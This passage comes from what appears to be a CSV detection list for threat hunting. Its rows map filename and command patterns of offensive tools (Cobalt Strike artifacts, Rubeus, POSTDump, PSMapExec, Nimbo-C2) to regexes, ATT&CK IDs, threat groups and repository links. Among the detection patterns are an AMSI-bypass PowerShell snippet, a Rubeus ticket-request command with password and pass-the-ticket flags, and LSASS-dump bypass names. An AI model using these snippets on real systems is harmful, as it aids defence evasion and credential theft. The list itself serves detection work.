TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact64.exe*",".{0,1000}artifact64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64.x64.dll*",".{0,1000}artifact64\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64big.exe*",".{0,1000}artifact64big\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64big.x64.dll*",".{0,1000}artifact64big\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64svc.exe*",".{0,1000}artifact64svc\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact64svcbig.exe*",".{0,1000}artifact64svcbig\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifactbig64.exe*",".{0,1000}artifactbig64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifactuac*.dll*",".{0,1000}artifactuac.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*aruba2john.py*",".{0,1000}aruba2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AS 'Login that can be impersonated'*",".{0,1000}AS\s\'Login\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*as 'Owner that can be impersonated'*",".{0,1000}as\s\'Owner\sthat\scan\sbe\simpersonated\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*ASBBypass.ps1*",".{0,1000}ASBBypass\.ps1.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "*Ask to take over RDP session if another used is logged in (workstation)*",".{0,1000}Ask\sto\stake\sover\sRDP\ssession\sif\sanother\sused\sis\slogged\sin\s\(workstation\).{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*asktgs.x64.o*",".{0,1000}asktgs\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*asktgt /user* /domain:* /password:* /opsec /force /ptt*",".{0,1000}asktgt\s\/user.{0,1000}\s\/domain\:.{0,1000}\s\/password\:.{0,1000}\s\/opsec\s\/force\s\/ptt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*asp-jinja-obfuscator.py*",".{0,1000}asp\-jinja\-obfuscator\.py.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*ASR_bypass_to_dump_LSASS.*",".{0,1000}ASR_bypass_to_dump_LSASS\..{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*ASR_bypass_to_dump_LSASS.cs*",".{0,1000}ASR_bypass_to_dump_LSASS\.cs.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*ASRenum-BOF.*",".{0,1000}ASRenum\-BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","131","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z" "*asrep_attack*",".{0,1000}asrep_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*asrep2kirbi*",".{0,1000}asrep2kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*asreprc4_attack*",".{0,1000}asreprc4_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*asreproast /*",".{0,1000}asreproast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Asreproast.*",".{0,1000}Asreproast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*ASREPRoast.ps1*",".{0,1000}ASREPRoast\.ps1.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*asreproast_*.txt*",".{0,1000}asreproast_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*asreproast_john_results_*",".{0,1000}asreproast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*asreproast_output_*.txt*",".{0,1000}asreproast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ASREProastables.txt*",".{0,1000}ASREProastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ASreproasting.txt*",".{0,1000}ASreproasting\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*asreproasting.x64*",".{0,1000}asreproasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*ASRepToHashcat*",".{0,1000}ASRepToHashcat.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Assemblies/SharpMove.exe*",".{0,1000}Assemblies\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*assembly *.asm *",".{0,1000}assembly\s.{0,1000}\.asm\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*assembly *.exe *",".{0,1000}assembly\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*assembly AMSITrigger *",".{0,1000}assembly\sAMSITrigger\s.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*Assembly.GetType(""System.Management.Automation.AmsiUtils"").getField(""amsiInitFailed""*'NonPublic*Static').SetValue($null*$true)*",".{0,1000}Assembly\.GetType\(\""System\.Management\.Automation\.AmsiUtils\""\)\.getField\(\""amsiInitFailed\"".{0,1000}\'NonPublic.{0,1000}Static\'\)\.SetValue\(\$null.{0,1000}\$true\).{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - 